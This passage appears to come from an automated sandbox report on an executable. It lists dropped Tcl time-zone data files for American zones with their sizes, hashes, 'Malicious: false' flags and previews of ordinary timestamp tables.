Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cayman) {. {-9223372036854775808 -19532 0 LMT}. {-2524502068 -18432 0 KMT}. {-1827687168 -18000 0 EST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Chicago Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11003
Entropy (8bit):	3.728817385585057
Encrypted:	false
SSDEEP:	192:rXxbWziyUZB4ME9Hmp7EYQYMWUJ2eQzURWu3OabMQxXI6X8x3X3D2DgOMIOdXkqq:rXxbWziyUZB4ME9Hmp7EYQYMWUJ2eQzg
MD5:	6175956F3052F3BE172F6110EF6342EE
SHA1:	532E2600DFAFAACCD3A187A233956462383401A6
SHA-256:	FC172494A4943F8D1C3FC35362D96F3D12D6D352984B93BC1DE7BDCB7C85F15E
SHA-512:	36B47003183EB9D7886F9980538DB3BDDC231BB27D4F14006CDBE0CB9042215A02559D97085679F8320DED6109FC7745DC43859EBA99B87365B09C4526D28193
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Chicago) {. {-9223372036854775808 -21036 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1577901600 -21600 0 CST}. {-1563724800 -18000 1 CDT}. {-1551632400 -21600 0 CST}. {-1538928000 -18000 1 CDT}. {-1520182800 -21600 0 CST}. {-1504454400 -18000 1 CDT}. {-1491757200 -21600 0 CST}. {-1473004800 -18000 1 CDT}. {-1459702800 -21600 0 CST}. {-1441555200 -18000 1 CDT}. {-1428253200 -21600 0 CST}. {-1410105600 -18000 1 CDT}. {-1396803600 -21600 0 CST}. {-1378656000 -18000 1 CDT}. {-1365354000 -21600 0 CST}. {-1347206400 -18000 1 CDT}. {-1333904400 -21600 0 CST}. {-1315152000 -18000 1 CDT}. {-1301850000 -21600 0 CST}. {-1283702400 -18000 1 CDT}. {-1270400400 -21600 0 CST}. {-1252252800 -18000 1 CDT}. {-1238950800 -21600 0 CST}. {-1220803200

C:\Users\user\Desktop\tcl\tzdata\America\Chihuahua Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6593
Entropy (8bit):	3.795313170000037
Encrypted:	false
SSDEEP:	96:LJNfzBT8tRkfKxhzY720zaOXmlITHjLc1cb:dN18tRkfKv+2wB9h
MD5:	B0CA4CFF6571AFBFF25FAC72CDDB5B08
SHA1:	1BF3ACEC369AEA504AAA248459A115E61CF79C4B
SHA-256:	C689A3BEED80D26EAB96C95C85874428F80699F7E136A44377776E52B5855D00
SHA-512:	398496EBA4344EDF78AFBF51BD6024481D3A12546D0EE597B7C593A1CD1BF575AFDE62FFADE7A0DDFEDA79CF235612E6F4DA74D7305A6E48F5942EA10D8A4F8E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Chihuahua) {. {-9223372036854775808 -25460 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {820476000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {883634400 -21600 0 CST}. {891766800 -21600 0 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600 1 MDT}. {1162108800 -25

C:\Users\user\Desktop\tcl\tzdata\America\Coral_Harbour Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	193
Entropy (8bit):	4.822360211437507
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7/qlfSwFVAIgp/qlfAvt2909qEac90/qlfu:MBaIMY/TwQp/tvt290Fac90/j
MD5:	2541EC94D1EA371AB1361118EEC98CC6
SHA1:	950E460C1BB680B591BA3ADA0CAA73EF07C229FE
SHA-256:	50E6EE06C0218FF19D5679D539983CEB2349E5D25F67FD05E142921431DC63D6
SHA-512:	2E6B66815565A9422015CAB8E972314055DC4141B5C21B302ABD671F30D0FBAE1A206F3474409826B65C30EDBEDD46E92A99251AB6316D59B09FC5A8095E7562
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Atikokan)]} {. LoadTimeZoneFile America/Atikokan.}.set TZData(:America/Coral_Harbour) $TZData(:America/Atikokan).

C:\Users\user\Desktop\tcl\tzdata\America\Cordoba Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	214
Entropy (8bit):	4.74004515366486
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y7/MdVAIgp/MOF29093+90/Msn:MBaIMY/M4p/MOF290c90/Ms
MD5:	89870B2001C2EE737755A692E7CA2F18
SHA1:	F67F6C22BF681C105068BEEB494A59B3809C5ED8
SHA-256:	38C3DD7DAF75DBF0179DBFC387CE7E64678232497AF0DACF35DC76050E9424F7
SHA-512:	EFA8A5A90BE6FAAA7C6F5F39CBBBA3C7D44C7943E1BB1B0F7E966FEE4F00F0E4BF1D999A377D4E5230271B120B059EB020BD93E7DA46CF1FFA54AB13D7EC3FFE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Argentina/Cordoba)]} {. LoadTimeZoneFile America/Argentina/Cordoba.}.set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba).

C:\Users\user\Desktop\tcl\tzdata\America\Costa_Rica Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	416
Entropy (8bit):	4.443696146912203
Encrypted:	false
SSDEEP:	12:MBp5290l0TmdHd5PZ6kibvI8/uFn/mSU/uFn/i/uFn/4Y8/uFn//DVn:cQmAed9Z6n5Sn/mtSn/iSn/4JSn/bh
MD5:	D47A1FBA5AD701E1CA168A356D0DA0A9
SHA1:	6738EA6B4F54CC76B9723917AA373034F6865AF1
SHA-256:	51F08C1671F07D21D69E2B7868AA5B9BDBFA6C31D57EB84EB5FF37A06002C5CD
SHA-512:	DB6AD81466500F22820941DF3369155BA03CFA42FA9D267984A28A6D15F88E1A71625E3DC578370B5F97727355EBB7C338482FA33A7701ADB85A160C09BAD232
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Costa_Rica) {. {-9223372036854775808 -20173 0 LMT}. {-2524501427 -20173 0 SJMT}. {-1545071027 -21600 0 CST}. {288770400 -18000 1 CDT}. {297234000 -21600 0 CST}. {320220000 -18000 1 CDT}. {328683600 -21600 0 CST}. {664264800 -18000 1 CDT}. {678344400 -21600 0 CST}. {695714400 -18000 1 CDT}. {700635600 -21600 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Creston Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	211
Entropy (8bit):	4.798554218839104
Encrypted:	false
SSDEEP:	6:SlSWB9X52909ovTm2OHpcHvvPagcyEXC/vHcQCi:MBp52900mdHpcHPagPECvHl
MD5:	9E3726148A53940507998FA1A5EEE6DB
SHA1:	2493B72DF895ED2AE91D09D43BDDADDB41E4DEBC
SHA-256:	E809F227E92542C6FB4BAC82E6079661EEF7700964079AA4D7E289B5B400EC49
SHA-512:	F5ED4085160A06DE672DB93CEE700C420D0438DE9AC3548B291DA236AA8CCC84F97270DA3956E49432AE1E281CCECEB6DF92E71EB305106655B4DF231E04B558
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Creston) {. {-9223372036854775808 -27964 0 LMT}. {-2713882436 -25200 0 MST}. {-1680454800 -28800 0 PST}. {-1627833600 -25200 0 MST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Cuiaba Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7771
Entropy (8bit):	3.7617088302190878
Encrypted:	false
SSDEEP:	192:H1M1w141C1f1t1m1B121C1+1u181u1g1c1m181Q1b171M13191H1L1w151i1M1Tc:V0AI6tzW/m6O+k+wEWkgRx0FDVBAXa04
MD5:	7ABE7E5CA88C79F45BB69CA5FFA31CE0
SHA1:	B8F114F908B63085053B21DFCB6E90FB904F5054
SHA-256:	5A64F2243FCC2CD7E691FFD45AC9ECA6BF0094ADAD2039A7F0D05D4CD79E2A6A
SHA-512:	853B7B36E772AD7F7A74BEE2D3A4422E6850A1EDC1181F0D9C13DCFA822812DEBD862FA1257B894F2445302D4E6DC7775952298FB9A66A739AF84195AD68FB4D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Cuiaba) {. {-9223372036854775808 -13460 0 LMT}. {-1767212140 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}. {5

C:\Users\user\Desktop\tcl\tzdata\America\Curacao Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	179
Entropy (8bit):	4.902826505851901
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE9CvjEwcXGm2OHCevUd5xF9vFVFkEiQG3VFpRR/vwvYv:SlSWB9X52909C4wTm2OHjyxzF8WUF/RD
MD5:	BB167EA9048274395066008EEC00F0F6
SHA1:	E3BA9EB1A3DB110E55CAF53ED6C4AFC95CBDF54D
SHA-256:	1200BDE9BEFD7AD388ACF4C7AD7285CC72FF06454B281116BDB12F869C5EE205
SHA-512:	9A9AAE95295AD0E824D19E1069627972B63C143102379C79A0F46EDB8E22261AC338C4316A16F48F46F6DD0E856A73C3D476AEBDC3DD0F9F7AB0CD257D3F55E4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Curacao) {. {-9223372036854775808 -16547 0 LMT}. {-1826738653 -16200 0 ANT}. {-157750200 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Danmarkshavn Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1105
Entropy (8bit):	4.067921329211614
Encrypted:	false
SSDEEP:	24:cQZeXmTWP3n1/EOXT9vjwF97pWEEhcSXCLFg:5imTWPX1/pRvjwF97p3EbYFg
MD5:	A1B64D8D13A8588194BBE01118B336B8
SHA1:	FEFFFE122AAD6AC92383B93CEC33AEBE9CBAC048
SHA-256:	4CDA1CFD04480F2E75319AFD1F7E58319746169FF64A46F51AD03694E6FEC6D8
SHA-512:	24774A35CF7AC2182C2550F8ABCC4BA226352E4FFCA1EF09013A213BB219CC17BE201E0EB37C9695C2090CEEDDBB179FAB6AC44C52A7F26788D5B025AE84BE73
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Danmarkshavn) {. {-9223372036854775808 -4480 0 LMT}. {-1686091520 -10800 0 WGT}. {323845200 -7200 0 WGST}. {338950800 -10800 0 WGT}. {354675600 -7200 1 WGST}. {370400400 -10800 0 WGT}. {386125200 -7200 1 WGST}. {401850000 -10800 0 WGT}. {417574800 -7200 1 WGST}. {433299600 -10800 0 WGT}. {449024400 -7200 1 WGST}. {465354000 -10800 0 WGT}. {481078800 -7200 1 WGST}. {496803600 -10800 0 WGT}. {512528400 -7200 1 WGST}. {528253200 -10800 0 WGT}. {543978000 -7200 1 WGST}. {559702800 -10800 0 WGT}. {575427600 -7200 1 WGST}. {591152400 -10800 0 WGT}. {606877200 -7200 1 WGST}. {622602000 -10800 0 WGT}. {638326800 -7200 1 WGST}. {654656400 -10800 0 WGT}. {670381200 -7200 1 WGST}. {686106000 -10800 0 WGT}. {701830800 -7200 1 WGST}. {717555600 -10800 0 WGT}. {733280400 -7200 1 WGST}. {749005200 -10800 0 WGT}. {764730000 -7200 1 WGST}. {780

C:\Users\user\Desktop\tcl\tzdata\America\Dawson Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7609
Entropy (8bit):	3.785302701923574
Encrypted:	false
SSDEEP:	96:nxr+C2ZCHtffWsBNwj/lpmlOxGcKcnRH31t+ucgge:nx/Nf+aNwj/lpmlOxnKcndIG
MD5:	4DBA9C83ECAD5B5A099CC1AA78D391B0
SHA1:	FFCC77D7964BD16BD8A554FB437BCF4F2FC8958E
SHA-256:	3A89A6834DDBE4A3A6A1CB8C1A1F9579259E7FD6C6C55DE21DCD4807753D8E48
SHA-512:	21212AFE8917C0F3BBED433B510C4FCE671B0DA887A1C7338A18CD5409B1A95E766510A9E636E5AA3AB0BA21D7D2C00A462FEBB10D4567A343B85AFE6A3E2394
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Dawson) {. {-9223372036854775808 -33460 0 LMT}. {-2188996940 -32400 0 YST}. {-1632056400 -28800 1 YDT}. {-1615125600 -32400 0 YST}. {-1596978000 -28800 1 YDT}. {-1583164800 -32400 0 YST}. {-880203600 -28800 1 YWT}. {-769395600 -28800 1 YPT}. {-765381600 -32400 0 YST}. {-147884400 -25200 1 YDDT}. {-131554800 -32400 0 YST}. {315561600 -28800 0 PST}. {325677600 -25200 1 PDT}. {341398800 -28800 0 PST}. {357127200 -25200 1 PDT}. {372848400 -28800 0 PST}. {388576800 -25200 1 PDT}. {404902800 -28800 0 PST}. {420026400 -25200 1 PDT}. {436352400 -28800 0 PST}. {452080800 -25200 1 PDT}. {467802000 -28800 0 PST}. {483530400 -25200 1 PDT}. {499251600 -28800 0 PST}. {514980000 -25200 1 PDT}. {530701200 -28800 0 PST}. {544615200 -25200 1 PDT}. {562150800 -28800 0 PST}. {576064800 -25200 1 PDT}. {594205200 -28800 0 PST}. {607514400 -25200 1 PDT}

C:\Users\user\Desktop\tcl\tzdata\America\Dawson_Creek Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1876
Entropy (8bit):	3.9458112723626755
Encrypted:	false
SSDEEP:	24:cQ4eJ58IlJ14RsT8X+km8VnynhBZ2c4Y+O4A5W5xDICW2n7oZA8QZFaIOvkty1H2:5DH0yIRkf12fZGJ5LB6xfZ89Y
MD5:	D7E4978775F290809B7C042674F46903
SHA1:	E94DB1EBB6A1594ED1A5AEA48B52395482D06085
SHA-256:	2E6CFFE8E0C1FE93F55B1BD01F96AA1F3CE645BC802C061CB4917318E30C4494
SHA-512:	1FF3CD58A4C4DEC7538F0816E93E6577C51B0045CF36190FF4D327E81FB8282ADDB0EF20BD78A838ABD507EBAD1C187F2A20CC7840E2325B9C326EC449897B45
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Dawson_Creek) {. {-9223372036854775808 -28856 0 LMT}. {-2713881544 -28800 0 PST}. {-1632060000 -25200 1 PDT}. {-1615129200 -28800 0 PST}. {-880207200 -25200 1 PWT}. {-769395600 -25200 1 PPT}. {-765385200 -28800 0 PST}. {-725817600 -28800 0 PST}. {-715788000 -25200 1 PDT}. {-702486000 -28800 0 PST}. {-684338400 -25200 1 PDT}. {-671036400 -28800 0 PST}. {-652888800 -25200 1 PDT}. {-639586800 -28800 0 PST}. {-620834400 -25200 1 PDT}. {-608137200 -28800 0 PST}. {-589384800 -25200 1 PDT}. {-576082800 -28800 0 PST}. {-557935200 -25200 1 PDT}. {-544633200 -28800 0 PST}. {-526485600 -25200 1 PDT}. {-513183600 -28800 0 PST}. {-495036000 -25200 1 PDT}. {-481734000 -28800 0 PST}. {-463586400 -25200 1 PDT}. {-450284400 -28800 0 PST}. {-431532000 -25200 1 PDT}. {-418230000 -28800 0 PST}. {-400082400 -25200 1 PDT}. {-386780400 -28800 0 PST}. {-

C:\Users\user\Desktop\tcl\tzdata\America\Denver Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8629
Entropy (8bit):	3.76966035849006
Encrypted:	false
SSDEEP:	96:4cGbc2sGm+4I1zXN+C2mWBNQMsmNTxf6AeO+cblX:4c2dVUC2mWBNwWTxyWR
MD5:	F641A7F5DE8FCF4ADC1E5A1A2C9DEC53
SHA1:	B013EBBE8002C91C0C45A2D389245A1A9194077A
SHA-256:	DF5459068DB3C771E41BE8D62FB89A2822CB2A33CF9A5640C6C666AB20ECE608
SHA-512:	C2EA07FF21FD6D1A45A87C6AD85DD3929C2B56E66A52D23103DDFF7B2B3B6433EC5EBFC17BED0F9C0A9AF036F0DF965E12EA3D4463207A128AEF5F6BC12970D7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Denver) {. {-9223372036854775808 -25196 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-1577898000 -25200 0 MST}. {-1570374000 -21600 1 MDT}. {-1551628800 -25200 0 MST}. {-1538924400 -21600 1 MDT}. {-1534089600 -25200 0 MST}. {-883587600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-757357200 -25200 0 MST}. {-147884400 -21600 1 MDT}. {-131558400 -25200 0 MST}. {-116434800 -21600 1 MDT}. {-100108800 -25200 0 MST}. {-94669200 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-52930800 -21600 1 MDT}. {-37209600 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {9968400 -21600 1 MDT}. {25689600 -25200 0 MST}. {41418000 -21600 1 MDT}. {57744000 -25200

C:\Users\user\Desktop\tcl\tzdata\America\Detroit Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8068
Entropy (8bit):	3.7425385734246395
Encrypted:	false
SSDEEP:	96:FVzAL/QaC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:FVsLQrn+qvOTFhPI1jFIL
MD5:	7FE983DC88FDC4978CD0527052A5A5C8
SHA1:	DC9193B5BE70D1E36B595B94AF9FFCF0FBC2D3AF
SHA-256:	0FA6CF7F37C95E9E1FEA517057DCB9A9F31DE73C56865DB260CB9BB8C558E8D1
SHA-512:	825C8BA13359A214F2CF227A5A8DEF57FD34CFFAD824868C2CD82659C36611A43EE74C20BA683A6F18E7EF937F0A76C32F96E3FF812161F45AA59347E0BCFAD2
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Detroit) {. {-9223372036854775808 -19931 0 LMT}. {-2051202469 -21600 0 CST}. {-1724083200 -18000 0 EST}. {-883594800 -18000 0 EST}. {-880218000 -14400 1 EWT}. {-769395600 -14400 1 EPT}. {-765396000 -18000 0 EST}. {-757364400 -18000 0 EST}. {-684349200 -14400 1 EDT}. {-671047200 -18000 0 EST}. {-80499600 -14400 1 EDT}. {-68666400 -18000 0 EST}. {94712400 -18000 0 EST}. {104914800 -14400 1 EDT}. {120636000 -18000 0 EST}. {126687600 -14400 1 EDT}. {152085600 -18000 0 EST}. {157784400 -18000 0 EST}. {167814000 -14400 0 EDT}. {183535200 -18000 0 EST}. {199263600 -14400 1 EDT}. {215589600 -18000 0 EST}. {230713200 -14400 1 EDT}. {247039200 -18000 0 EST}. {262767600 -14400 1 EDT}. {278488800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}.

C:\Users\user\Desktop\tcl\tzdata\America\Dominica Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	150
Entropy (8bit):	4.972086905253168
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52IAcGE6ALoFSXGm2OHRvVvUdRR7FpRzVvwvYv:SlSWB9X5290TLoFJm2OHpVG/zVr
MD5:	4DD3CCF52F3868A20870D65C3E359743
SHA1:	A6B0A142BCE7D9202F8E9664CC90F09BBBF79D3B
SHA-256:	D396833B1D3B1FE44FFCF2FDEF72FDD8F029925E2414FDA17F81CD3E65DBD59F
SHA-512:	D94A916977F6808031CE33F549110D33440C5704FD4D70E4875C40BEA78E8142AB444D23DC1798E55145044DCD8EE4B89E834A5786CFD71EFC3483130FA0657C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Dominica) {. {-9223372036854775808 -14736 0 LMT}. {-1846266804 -14400 0 AST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Edmonton Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8435
Entropy (8bit):	3.7724320820194475
Encrypted:	false
SSDEEP:	96:7tGVgeb0Gm+qI1zXN+C2mWBNQMsmNTxf6AeO+cblX:7heJ/UC2mWBNwWTxyWR
MD5:	FECBDD64036247B2FBB723ADD8F798F6
SHA1:	60B1719958AD6151CDB174A319A396D5F48C7CF1
SHA-256:	EC95041E0A97B37A60EF16A6FA2B6BCB1EBEFABBC9468B828D0F467595132BC2
SHA-512:	7CF94EC5040F4C8FA3C6ED30CFDAB59A199C18AA0CDA9A66D1A477F15563D2B7CB872CEEF1E2295E0F3B9A85508A03AEC29E3ECEBE11D9B089A92794D510BA00
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Edmonton) {. {-9223372036854775808 -27232 0 LMT}. {-1998663968 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1600614000 -21600 1 MDT}. {-1596816000 -25200 0 MST}. {-1567954800 -21600 1 MDT}. {-1551628800 -25200 0 MST}. {-1536505200 -21600 1 MDT}. {-1523203200 -25200 0 MST}. {-1504450800 -21600 1 MDT}. {-1491753600 -25200 0 MST}. {-1473001200 -21600 1 MDT}. {-1459699200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-715791600 -21600 1 MDT}. {-702489600 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-21481200 -21600 1 MDT}. {-5760000 -25200 0 MST}. {73472400 -21600 1 MDT}. {89193600 -25200 0 MST}. {104922000 -21600 1 MDT}. {120643200 -25200 0 MST}. {136371600 -21600 1 MDT}. {152092800 -25200 0 MST}. {167821200 -21600 1 MDT}. {183542400

C:\Users\user\Desktop\tcl\tzdata\America\Eirunepe Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1174
Entropy (8bit):	4.014131030146366
Encrypted:	false
SSDEEP:	24:cQOX9eptVwss/uS+L/ux+y/up+a/uj+Ne/ud+Rs/uX4+G/u43+a/uo8+h/u1F+El:5OXUCsQt8uqwd4rghFGRhGj+tX1R+fGO
MD5:	FEE5FD878B250DDDF0CEC30F6F6A7C3C
SHA1:	ED94E9DC9A246FD1FFCA817FC0B18A8B2945E371
SHA-256:	DA1F3923B9C7EFBFBCDF169C9E6E8F184695F2FD919FD04733EE05BB9FD7FC6E
SHA-512:	7187D385BB88590F46802307BE17D90F612DD8B1646C9B28E8115B5DC4AA909EFCB0B29438C7F65C6D6C18B79F285636F1578C4FED3D95A33B78225549118036
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Eirunepe) {. {-9223372036854775808 -16768 0 LMT}. {-1767208832 -18000 0 ACT}. {-1206950400 -14400 1 ACST}. {-1191355200 -18000 0 ACT}. {-1175367600 -14400 1 ACST}. {-1159819200 -18000 0 ACT}. {-633812400 -14400 1 ACST}. {-622062000 -18000 0 ACT}. {-602276400 -14400 1 ACST}. {-591825600 -18000 0 ACT}. {-570740400 -14400 1 ACST}. {-560203200 -18000 0 ACT}. {-539118000 -14400 1 ACST}. {-531345600 -18000 0 ACT}. {-191358000 -14400 1 ACST}. {-184190400 -18000 0 ACT}. {-155156400 -14400 1 ACST}. {-150062400 -18000 0 ACT}. {-128890800 -14400 1 ACST}. {-121118400 -18000 0 ACT}. {-99946800 -14400 1 ACST}. {-89582400 -18000 0 ACT}. {-68410800 -14400 1 ACST}. {-57960000 -18000 0 ACT}. {499755600 -14400 1 ACST}. {511243200 -18000 0 ACT}. {530600400 -14400 1 ACST}. {540273600 -18000 0 ACT}. {562136400 -14400 1 ACST}. {571204800 -18000 0 ACT}.

C:\Users\user\Desktop\tcl\tzdata\America\El_Salvador Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	269
Entropy (8bit):	4.7060952459188305
Encrypted:	false
SSDEEP:	6:SlSWB9X529078iwTm2OHvJ4YRIgdrV/uFn/acD3/uFn/sVn:MBp5290785mdHx4YlB/uFn/z/uFn/U
MD5:	77BE2E0759A3B7227B4DAC601A670D03
SHA1:	1FB09211F291E5B1C5CC9848EB53106AF48EE830
SHA-256:	40994535FE02326EA9E373F54CB60804BA7AE7162B52EA5F73497E7F72F2D482
SHA-512:	EB5E6A4A912053E399F6225A02DDC524A223D4A5724165CAD9009F1FA10B042F971E52CE17B395A86BC80FCC6897FD2CCC3B00708506FEF39E4D71812F5DF595
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:America/El_Salvador) {. {-9223372036854775808 -21408 0 LMT}. {-1546279392 -21600 0 CST}. {547020000 -18000 1 CDT}. {559717200 -21600 0 CST}. {578469600 -18000 1 CDT}. {591166800 -21600 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\America\Ensenada Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.786739478919165
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0qfSwVAIg20qfo2IAcGE7JM7QIAcGEqfu:SlSWB9IZaM3y7eHVAIgpeo2907390eu
MD5:	74AB4664E80A145D808CAB004A22859B
SHA1:	2AF7665C4E155A227B3F76D1C4BC87854C25A6CB
SHA-256:	BDD0893AA5D170F388B1E93CE5FE2EDF438866707E52033E49898AFC499F86C5
SHA-512:	CCC2E75E07BA1CAAFD1149A22D07668D191594272922AA2A1CE6DE628A8FF49AD90AA8BFE75C005328820C700B991AD87A6F40DEB5AD519B2708D8F7BF04E5A0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Tijuana)]} {. LoadTimeZoneFile America/Tijuana.}.set TZData(:America/Ensenada) $TZData(:America/Tijuana).

C:\Users\user\Desktop\tcl\tzdata\America\Fort_Wayne Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	226
Entropy (8bit):	4.730673843485836
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3y73GK7mFVAIgp3GKBL290HXYAp4903GK1:MBaIMY3GK7Hp3GKBL290Hz4903GK1
MD5:	4685E4E850E0B6669F72B8E1B4314A0A
SHA1:	BC6CCD58A2977A1E125B21D7B8FD57E800E624E1
SHA-256:	D35F335D6F575F95CEA4FF53382C0BE0BE94BE7EB8B1E0CA3B7C50E8F7614E4E
SHA-512:	867003B33A5FC6E42D546FBFC7A8AB351DE72232B89BA1BEC6DB566F6DCE135E65C08DE9112837190EB21D677E2F83E7E0F6049EC70CB9E36F223DE3A68E000A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Indianapolis)]} {. LoadTimeZoneFile America/Indiana/Indianapolis.}.set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis).

C:\Users\user\Desktop\tcl\tzdata\America\Fortaleza Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	3.9968678665202413
Encrypted:	false
